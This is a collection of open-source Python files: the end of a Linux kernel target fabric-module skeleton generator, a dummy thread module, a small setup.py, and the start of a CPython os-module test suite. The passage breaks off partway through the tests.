		tcm_mod_err("Unable to open file: " + fi)
	# Fixed preamble: kernel/SCSI/target-core includes for the .c file.
	buf = "#include <linux/slab.h>\n"
	buf += "#include <linux/kthread.h>\n"
	buf += "#include <linux/types.h>\n"
	buf += "#include <linux/list.h>\n"
	buf += "#include <linux/types.h>\n"
	buf += "#include <linux/string.h>\n"
	buf += "#include <linux/ctype.h>\n"
	buf += "#include <asm/unaligned.h>\n"
	buf += "#include <scsi/scsi.h>\n"
	buf += "#include <scsi/scsi_host.h>\n"
	buf += "#include <scsi/scsi_device.h>\n"
	buf += "#include <scsi/scsi_cmnd.h>\n"
	buf += "#include <scsi/libfc.h>\n\n"
	buf += "#include <target/target_core_base.h>\n"
	buf += "#include <target/target_core_fabric.h>\n"
	buf += "#include <target/target_core_configfs.h>\n\n"
	buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
	buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
	# Unconditional helpers every fabric module gets.
	buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
	buf += "{\n"
	buf += "	return 1;\n"
	buf += "}\n\n"
	bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
	buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
	buf += "{\n"
	buf += "	return 0;\n"
	buf += "}\n\n"
	bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
	# One stub per collected fabric-ops entry; each if-block matches a
	# known member name and emits its implementation + prototype.
	total_fabric_ops = len(fabric_ops)
	i = 0
	while i < total_fabric_ops:
		fo = fabric_ops[i]
		i += 1
		# print "fabric_ops: " + fo
		if re.search('get_fabric_name', fo):
			buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
			buf += "{\n"
			buf += "	return \"" + fabric_mod_name[4:] + "\";\n"
			buf += "}\n\n"
			bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
			continue
		if re.search('get_fabric_proto_ident', fo):
			buf += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *se_tpg)\n"
			buf += "{\n"
			buf += "	struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
			buf += "				struct " + fabric_mod_name + "_tpg, se_tpg);\n"
			buf += "	struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
			buf += "	u8 proto_id;\n\n"
			buf += "	switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
			if proto_ident == "FC":
				buf += "	case SCSI_PROTOCOL_FCP:\n"
				buf += "	default:\n"
				buf += "		proto_id = fc_get_fabric_proto_ident(se_tpg);\n"
				buf += "		break;\n"
			elif proto_ident == "SAS":
				buf += "	case SCSI_PROTOCOL_SAS:\n"
				buf += "	default:\n"
				buf += "		proto_id = sas_get_fabric_proto_ident(se_tpg);\n"
				buf += "		break;\n"
			elif proto_ident == "iSCSI":
				buf += "	case SCSI_PROTOCOL_ISCSI:\n"
				buf += "	default:\n"
				buf += "		proto_id = iscsi_get_fabric_proto_ident(se_tpg);\n"
				buf += "		break;\n"
			buf += "	}\n\n"
			buf += "	return proto_id;\n"
			buf += "}\n\n"
			bufi += "u8 " + fabric_mod_name + "_get_fabric_proto_ident(struct se_portal_group *);\n"
		if re.search('get_wwn', fo):
			buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
			buf += "{\n"
			buf += "	struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
			buf += "				struct " + fabric_mod_name + "_tpg, se_tpg);\n"
			buf += "	struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
			buf += "	return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
			buf += "}\n\n"
			bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
		if re.search('get_tag', fo):
			buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
			buf += "{\n"
			buf += "	struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
			buf += "				struct " + fabric_mod_name + "_tpg, se_tpg);\n"
			buf += "	return tpg->" + fabric_mod_port + "_tpgt;\n"
			buf += "}\n\n"
			bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
		if re.search('get_default_depth', fo):
			buf += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *se_tpg)\n"
			buf += "{\n"
			buf += "	return 1;\n"
			buf += "}\n\n"
			bufi += "u32 " + fabric_mod_name + "_get_default_depth(struct se_portal_group *);\n"
		if re.search('get_pr_transport_id\)\(', fo):
			buf += "u32 " + fabric_mod_name + "_get_pr_transport_id(\n"
			buf += "	struct se_portal_group *se_tpg,\n"
			buf += "	struct se_node_acl *se_nacl,\n"
			buf += "	struct t10_pr_registration *pr_reg,\n"
			buf += "	int *format_code,\n"
			buf += "	unsigned char *buf)\n"
			buf += "{\n"
			buf += "	struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
			buf += "				struct " + fabric_mod_name + "_tpg, se_tpg);\n"
			buf += "	struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
			buf += "	int ret = 0;\n\n"
			buf += "	switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
			if proto_ident == "FC":
				buf += "	case SCSI_PROTOCOL_FCP:\n"
				buf += "	default:\n"
				buf += "		ret = fc_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
				buf += "					format_code, buf);\n"
				buf += "		break;\n"
			elif proto_ident == "SAS":
				buf += "	case SCSI_PROTOCOL_SAS:\n"
				buf += "	default:\n"
				buf += "		ret = sas_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
				buf += "					format_code, buf);\n"
				buf += "		break;\n"
			elif proto_ident == "iSCSI":
				buf += "	case SCSI_PROTOCOL_ISCSI:\n"
				buf += "	default:\n"
				buf += "		ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
				buf += "					format_code, buf);\n"
				buf += "		break;\n"
			buf += "	}\n\n"
			buf += "	return ret;\n"
			buf += "}\n\n"
			bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
			bufi += "			struct se_node_acl *, struct t10_pr_registration *,\n"
			bufi += "			int *, unsigned char *);\n"
		if re.search('get_pr_transport_id_len\)\(', fo):
			buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
			buf += "	struct se_portal_group *se_tpg,\n"
			buf += "	struct se_node_acl *se_nacl,\n"
			buf += "	struct t10_pr_registration *pr_reg,\n"
			buf += "	int *format_code)\n"
			buf += "{\n"
			buf += "	struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
			buf += "				struct " + fabric_mod_name + "_tpg, se_tpg);\n"
			buf += "	struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
			buf += "	int ret = 0;\n\n"
			buf += "	switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
			if proto_ident == "FC":
				buf += "	case SCSI_PROTOCOL_FCP:\n"
				buf += "	default:\n"
				buf += "		ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
				buf += "					format_code);\n"
				buf += "		break;\n"
			elif proto_ident == "SAS":
				buf += "	case SCSI_PROTOCOL_SAS:\n"
				buf += "	default:\n"
				buf += "		ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
				buf += "					format_code);\n"
				buf += "		break;\n"
			elif proto_ident == "iSCSI":
				buf += "	case SCSI_PROTOCOL_ISCSI:\n"
				buf += "	default:\n"
				buf += "		ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
				buf += "					format_code);\n"
				buf += "		break;\n"
			buf += "	}\n\n"
			buf += "	return ret;\n"
			buf += "}\n\n"
			bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
			bufi += "			struct se_node_acl *, struct t10_pr_registration *,\n"
			bufi += "			int *);\n"
		if re.search('parse_pr_out_transport_id\)\(', fo):
			buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
			buf += "	struct se_portal_group *se_tpg,\n"
			buf += "	const char *buf,\n"
			buf += "	u32 *out_tid_len,\n"
			buf += "	char **port_nexus_ptr)\n"
			buf += "{\n"
			buf += "	struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
			buf += "				struct " + fabric_mod_name + "_tpg, se_tpg);\n"
			buf += "	struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
			buf += "	char *tid = NULL;\n\n"
			buf += "	switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
			if proto_ident == "FC":
				buf += "	case SCSI_PROTOCOL_FCP:\n"
				buf += "	default:\n"
				buf += "		tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
				buf += "				port_nexus_ptr);\n"
			elif proto_ident == "SAS":
				buf += "	case SCSI_PROTOCOL_SAS:\n"
				buf += "	default:\n"
				buf += "		tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
				buf += "				port_nexus_ptr);\n"
			elif proto_ident == "iSCSI":
				buf += "	case SCSI_PROTOCOL_ISCSI:\n"
				buf += "	default:\n"
				buf += "		tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
				buf += "				port_nexus_ptr);\n"
			buf += "	}\n\n"
			buf += "	return tid;\n"
			buf += "}\n\n"
			bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
			bufi += "			const char *, u32 *, char **);\n"
		if re.search('alloc_fabric_acl\)\(', fo):
			buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
			buf += "{\n"
			buf += "	struct " + fabric_mod_name + "_nacl *nacl;\n\n"
			buf += "	nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
			buf += "	if (!nacl) {\n"
			buf += "		printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_nacl\\n\");\n"
			buf += "		return NULL;\n"
			buf += "	}\n\n"
			buf += "	return &nacl->se_node_acl;\n"
			buf += "}\n\n"
			bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"
		if re.search('release_fabric_acl\)\(', fo):
			buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
			buf += "	struct se_portal_group *se_tpg,\n"
			buf += "	struct se_node_acl *se_nacl)\n"
			buf += "{\n"
			buf += "	struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
			buf += "			struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
			buf += "	kfree(nacl);\n"
			buf += "}\n\n"
			bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
			bufi += "			struct se_node_acl *);\n"
		if re.search('tpg_get_inst_index\)\(', fo):
			buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
			buf += "{\n"
			buf += "	return 1;\n"
			buf += "}\n\n"
			bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
		if re.search('\*release_cmd\)\(', fo):
			buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
			buf += "{\n"
			buf += "	return;\n"
			buf += "}\n\n"
			bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
		if re.search('shutdown_session\)\(', fo):
			buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
			buf += "{\n"
			buf += "	return 0;\n"
			buf += "}\n\n"
			bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
		if re.search('close_session\)\(', fo):
			buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
			buf += "{\n"
			buf += "	return;\n"
			buf += "}\n\n"
			bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
		if re.search('stop_session\)\(', fo):
			buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
			buf += "{\n"
			buf += "	return;\n"
			buf += "}\n\n"
			bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"
		if re.search('fall_back_to_erl0\)\(', fo):
			buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
			buf += "{\n"
			buf += "	return;\n"
			buf += "}\n\n"
			bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"
		if re.search('sess_logged_in\)\(', fo):
			buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
			buf += "{\n"
			buf += "	return 0;\n"
			buf += "}\n\n"
			bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"
		if re.search('sess_get_index\)\(', fo):
			buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
			buf += "{\n"
			buf += "	return 0;\n"
			buf += "}\n\n"
			bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
		if re.search('write_pending\)\(', fo):
			buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
			buf += "{\n"
			buf += "	return 0;\n"
			buf += "}\n\n"
			bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
		if re.search('write_pending_status\)\(', fo):
			buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
			buf += "{\n"
			buf += "	return 0;\n"
			buf += "}\n\n"
			bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
		if re.search('set_default_node_attributes\)\(', fo):
			buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
			buf += "{\n"
			buf += "	return;\n"
			buf += "}\n\n"
			bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
		if re.search('get_task_tag\)\(', fo):
			buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
			buf += "{\n"
			buf += "	return 0;\n"
			buf += "}\n\n"
			bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"
		if re.search('get_cmd_state\)\(', fo):
			buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
			buf += "{\n"
			buf += "	return 0;\n"
			buf += "}\n\n"
			bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
		if re.search('queue_data_in\)\(', fo):
			buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
			buf += "{\n"
			buf += "	return 0;\n"
			buf += "}\n\n"
			bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
		if re.search('queue_status\)\(', fo):
			buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
			buf += "{\n"
			buf += "	return 0;\n"
			buf += "}\n\n"
			bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
		if re.search('queue_tm_rsp\)\(', fo):
			buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
			buf += "{\n"
			buf += "	return 0;\n"
			buf += "}\n\n"
			bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
		if re.search('is_state_remove\)\(', fo):
			buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
			buf += "{\n"
			buf += "	return 0;\n"
			buf += "}\n\n"
			bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"
	# Flush both buffers; file.write() returns None on success in
	# Python 2, so a truthy ret here is treated as a failure.
	ret = p.write(buf)
	if ret:
		tcm_mod_err("Unable to write f: " + f)
	p.close()
	ret = pi.write(bufi)
	if ret:
		tcm_mod_err("Unable to write fi: " + fi)
	pi.close()
	return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
	"""Write the new fabric module's kbuild Makefile.

	Emits the <name>-objs object list and the obj-$(CONFIG_...) rule
	into <fabric_mod_dir_var>/Makefile.  The whitespace inside the
	generated strings is significant to make/kbuild formatting.
	"""
	buf = ""
	f = fabric_mod_dir_var + "/Makefile"
	print "Writing file: " + f
	p = open(f, 'w')
	if not p:
		tcm_mod_err("Unable to open file: " + f)
	buf += fabric_mod_name + "-objs			:= " + fabric_mod_name + "_fabric.o \\\n"
	buf += "					   " + fabric_mod_name + "_configfs.o\n"
	buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ")	+= " + fabric_mod_name + ".o\n"
	# Python 2 file.write() returns None on success; truthy means error.
	ret = p.write(buf)
	if ret:
		tcm_mod_err("Unable to write f: " + f)
	p.close()
	return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
	"""Write the new fabric module's Kconfig entry.

	Emits a tristate config symbol named after the module (uppercased),
	depending on TARGET_CORE and CONFIGFS_FS, into
	<fabric_mod_dir_var>/Kconfig.
	"""
	buf = ""
	f = fabric_mod_dir_var + "/Kconfig"
	print "Writing file: " + f
	p = open(f, 'w')
	if not p:
		tcm_mod_err("Unable to open file: " + f)
	buf = "config " + fabric_mod_name.upper() + "\n"
	buf += "	tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
	buf += "	depends on TARGET_CORE && CONFIGFS_FS\n"
	buf += "	default n\n"
	buf += "	---help---\n"
	buf += "	Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
	# Python 2 file.write() returns None on success; truthy means error.
	ret = p.write(buf)
	if ret:
		tcm_mod_err("Unable to write f: " + f)
	p.close()
	return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
	"""Append the new module's obj-$(CONFIG_...) rule to the target Makefile.

	Appends a single kbuild line for <fabric_mod_name> (lowercased
	subdirectory) to <tcm_dir>/drivers/target/Makefile.
	The file handle is now closed via try/finally so it cannot leak if
	write() raises (the original leaked the handle on a write error).
	"""
	buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ")	+= " + fabric_mod_name.lower() + "/\n"
	kbuild = tcm_dir + "/drivers/target/Makefile"
	f = open(kbuild, 'a')
	try:
		f.write(buf)
	finally:
		f.close()
	return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
	"""Append a source line for the new module to the target Kconfig.

	Appends 'source "drivers/target/<name>/Kconfig"' to
	<tcm_dir>/drivers/target/Kconfig.  The file handle is now closed via
	try/finally so it cannot leak if write() raises (the original leaked
	the handle on a write error).
	"""
	buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
	kconfig = tcm_dir + "/drivers/target/Kconfig"
	f = open(kconfig, 'a')
	try:
		f.write(buf)
	finally:
		f.close()
	return
def main(modname, proto_ident):
	"""Drive the whole fabric-module skeleton generation.

	Validates proto_ident (FC/SAS/iSCSI), creates the module directory
	under <cwd>/../../drivers/target/<modname>, generates all source
	files, then interactively offers to wire the module into the
	kernel's Makefile/Kconfig via raw_input prompts.
	"""
	# proto_ident = "FC"
	# proto_ident = "SAS"
	# proto_ident = "iSCSI"
	tcm_dir = os.getcwd();
	tcm_dir += "/../../"
	print "tcm_dir: " + tcm_dir
	fabric_mod_name = modname
	fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
	print "Set fabric_mod_name: " + fabric_mod_name
	print "Set fabric_mod_dir: " + fabric_mod_dir
	print "Using proto_ident: " + proto_ident
	if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
		print "Unsupported proto_ident: " + proto_ident
		sys.exit(1)
	# Non-zero return means the module directory already exists.
	ret = tcm_mod_create_module_subdir(fabric_mod_dir)
	if ret:
		print "tcm_mod_create_module_subdir() failed because module already exists!"
		sys.exit(1)
	tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
	tcm_mod_scan_fabric_ops(tcm_dir)
	tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
	tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
	tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
	tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
	# NOTE(review): the prompt is missing a space before "to drivers";
	# cosmetic only, left as-is here.
	input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
	if input == "yes" or input == "y":
		tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
	input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
	if input == "yes" or input == "y":
		tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
	return
# Command-line interface: both -m/--modulename and -p/--protoident are
# mandatory; parsing happens at import time, before the __main__ guard.
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
		action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
		action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
# Bail out with usage help if either required option is absent.
mandatories = ['modname', 'protoident']
for m in mandatories:
	if not opts.__dict__[m]:
		print "mandatory option is missing\n"
		parser.print_help()
		exit(-1)
if __name__ == "__main__":
	main(str(opts.modname), opts.protoident)
| gpl-2.0 |
romankagan/DDBWorkbench | python/lib/Lib/dummy_thread.py | 86 | 4494 | """Drop-in replacement for the thread module.
Meant to be used as a brain-dead substitute so that threaded code does
not need to be rewritten for when the thread module is not present.
Suggested usage is::
try:
import thread
except ImportError:
import dummy_thread as thread
"""
__author__ = "Brett Cannon"
__email__ = "brett@python.org"
# Exports only things specified by thread documentation
# (skipping obsolete synonyms allocate(), start_new(), exit_thread())
__all__ = ['error', 'start_new_thread', 'exit', 'get_ident', 'allocate_lock',
'interrupt_main', 'LockType']
import traceback as _traceback
import warnings
class error(Exception):
    """Dummy implementation of thread.error."""
    # Mirrors thread.error: stores the raw argument tuple on .args.
    def __init__(self, *args):
        self.args = args
def start_new_thread(function, args, kwargs={}):
    """Dummy implementation of thread.start_new_thread().
    Compatibility is maintained by making sure that ``args`` is a
    tuple and ``kwargs`` is a dictionary.  If an exception is raised
    and it is SystemExit (which can be done by thread.exit()) it is
    caught and nothing is done; all other exceptions are printed out
    by using traceback.print_exc().
    If the executed function calls interrupt_main the KeyboardInterrupt will be
    raised when the function returns.
    """
    # NOTE(review): kwargs={} is a shared mutable default; harmless here
    # because it is only read, never mutated.
    if type(args) != type(tuple()):
        raise TypeError("2nd arg must be a tuple")
    if type(kwargs) != type(dict()):
        raise TypeError("3rd arg must be a dict")
    global _main
    _main = False
    try:
        function(*args, **kwargs)
    except SystemExit:
        pass
    except:
        # Any other exception is reported but swallowed, matching how a
        # real thread would die without killing the interpreter.
        _traceback.print_exc()
    _main = True
    global _interrupt
    if _interrupt:
        # interrupt_main() was called while "the thread" ran: deliver it now.
        _interrupt = False
        raise KeyboardInterrupt
def exit():
    """Dummy implementation of thread.exit(): terminate the caller.

    Mirrors thread.exit() by raising SystemExit, which
    start_new_thread() silently absorbs.
    """
    raise SystemExit()
def get_ident():
    """Dummy implementation of thread.get_ident().

    This module is only used when the real thread module is missing,
    so the running process is the sole "thread" and a fixed identifier
    is sufficient.
    """
    return -1
def allocate_lock():
    """Dummy implementation of thread.allocate_lock().

    Hands back a fresh LockType instance, the single-threaded stand-in
    for a real lock.
    """
    lock = LockType()
    return lock
def stack_size(size=None):
    """Dummy implementation of thread.stack_size().

    Querying (size is None) always reports 0; attempting to set a size
    raises error, since there is no real thread to configure.
    """
    if size is None:
        return 0
    raise error("setting thread stack size not supported")
class LockType(object):
    """Single-threaded stand-in for thread.LockType.

    The lock state lives in the boolean ``locked_status``.  Because no
    real concurrency exists, a "blocking" acquire can always succeed
    immediately.  Instances should not be pickled: the methods are not
    atomic, so an unpickled lock used with the real thread module could
    misbehave.
    """
    def __init__(self):
        # Starts out released.
        self.locked_status = False
    def acquire(self, waitflag=None):
        """Acquire the dummy lock.

        A blocking call (waitflag omitted/None or truthy) always takes
        the lock and returns True.  A non-blocking call (falsy waitflag)
        only takes the lock when it is free, returning False otherwise —
        this keeps threading.Condition's internal assertions happy.
        """
        if waitflag is None or waitflag:
            self.locked_status = True
            return True
        if not self.locked_status:
            self.locked_status = True
            return True
        return False
    __enter__ = acquire
    def __exit__(self, typ, val, tb):
        self.release()
    def release(self):
        """Release the dummy lock; raise error if it is not held."""
        # XXX Perhaps shouldn't actually bother to test?  Could lead
        # to problems for complex, threaded code.
        if not self.locked_status:
            raise error
        self.locked_status = False
        return True
    def locked(self):
        """Return True while the lock is held."""
        return self.locked_status
# Used to signal that interrupt_main was called in a "thread";
# start_new_thread() checks and clears it when the function returns.
_interrupt = False
# True when not executing in a "thread" (i.e. in the main flow of control)
_main = True
def interrupt_main():
    """Request a KeyboardInterrupt for the "main thread".

    Called from the main flow of control (_main is True) it raises
    immediately; called from inside a dummy "thread" it just sets
    _interrupt so start_new_thread() raises KeyboardInterrupt once the
    thread function returns.
    """
    global _interrupt
    if _main:
        raise KeyboardInterrupt
    _interrupt = True
| apache-2.0 |
arielvega/uremix-app-developer-helper | src/setup.py | 1 | 1452 | #
#
# Copyright 2011,2013 Luis Ariel Vega Soliz, Uremix (http://www.uremix.org) and contributors.
#
#
# This file is part of UADH (Uremix App Developer Helper).
#
# UADH is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UADH is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with UADH. If not, see <http://www.gnu.org/licenses/>.
#
#
'''
Created on 26/10/2011
@author: Luis Ariel Vega Soliz (ariel.vega@uremix.org)
@contact: Uremix Team (http://uremix.org)
'''
from setuptools import setup, find_packages
# Package metadata for UADH; runs at import time as is conventional for
# a setup.py.  NOTE(review): the install_requires entries look like
# Debian package names rather than PyPI distribution names — verify
# against the intended installation mechanism.
setup(name='uremix-app-developer-helper',
      version='0.3.1',
      description='Un conjunto de procedimientos de ayuda para el desarrollo de aplicaciones en Uremix (http://uremix.org)',
      author='Luis Ariel Vega Soliz',
      author_email='vsoliz.ariel@gmail.com',
      url='https://github.com/arielvega/uremix-app-developer-helper',
      license='GPL v3',
      packages = find_packages(),
      install_requires = ['python-configobj', 'python-gtk2']
      )
| gpl-3.0 |
mancoast/CPythonPyc_test | crash/275_test_os.py | 20 | 32797 | # As a test suite for the os module, this is woefully inadequate, but this
# does add tests for a few functions which have been determined to be more
# portable than they had been thought to be.
import os
import errno
import unittest
import warnings
import sys
import signal
import subprocess
import time
from test import test_support
import mmap
import uuid
warnings.filterwarnings("ignore", "tempnam", RuntimeWarning, __name__)
warnings.filterwarnings("ignore", "tmpnam", RuntimeWarning, __name__)
# Tests creating TESTFN
class FileTests(unittest.TestCase):
    """Basic os-level file tests that create/remove TESTFN themselves."""
    def setUp(self):
        # Ensure a clean slate: TESTFN must not exist before each test.
        if os.path.exists(test_support.TESTFN):
            os.unlink(test_support.TESTFN)
    tearDown = setUp
    def test_access(self):
        # A freshly created file must be writable per os.access().
        f = os.open(test_support.TESTFN, os.O_CREAT|os.O_RDWR)
        os.close(f)
        self.assertTrue(os.access(test_support.TESTFN, os.W_OK))
    def test_closerange(self):
        first = os.open(test_support.TESTFN, os.O_CREAT|os.O_RDWR)
        # We must allocate two consecutive file descriptors, otherwise
        # it will mess up other file descriptors (perhaps even the three
        # standard ones).
        second = os.dup(first)
        try:
            retries = 0
            while second != first + 1:
                os.close(first)
                retries += 1
                if retries > 10:
                    # XXX test skipped
                    self.skipTest("couldn't allocate two consecutive fds")
                first, second = second, os.dup(second)
        finally:
            os.close(second)
        # close a fd that is open, and one that isn't
        os.closerange(first, first + 2)
        self.assertRaises(OSError, os.write, first, "a")
    @test_support.cpython_only
    def test_rename(self):
        # os.rename with a non-string target must not leak a reference
        # to the source path object (CPython-specific refcount check).
        path = unicode(test_support.TESTFN)
        old = sys.getrefcount(path)
        self.assertRaises(TypeError, os.rename, path, 0)
        new = sys.getrefcount(path)
        self.assertEqual(old, new)
class TemporaryFileTests(unittest.TestCase):
    """Tests for the deprecated os.tempnam/os.tmpfile/os.tmpnam APIs."""
    def setUp(self):
        # Track files created by check_tempfile() for cleanup.
        self.files = []
        os.mkdir(test_support.TESTFN)
    def tearDown(self):
        for name in self.files:
            os.unlink(name)
        os.rmdir(test_support.TESTFN)
    def check_tempfile(self, name):
        # make sure it doesn't already exist:
        self.assertFalse(os.path.exists(name),
                        "file already exists for temporary file")
        # make sure we can create the file
        open(name, "w")
        self.files.append(name)
    def test_tempnam(self):
        if not hasattr(os, "tempnam"):
            return
        # Silence the RuntimeWarning/DeprecationWarning tempnam emits.
        with warnings.catch_warnings():
            warnings.filterwarnings("ignore", "tempnam", RuntimeWarning,
                                    r"test_os$")
            warnings.filterwarnings("ignore", "tempnam", DeprecationWarning)
            self.check_tempfile(os.tempnam())
            name = os.tempnam(test_support.TESTFN)
            self.check_tempfile(name)
            name = os.tempnam(test_support.TESTFN, "pfx")
            self.assertTrue(os.path.basename(name)[:3] == "pfx")
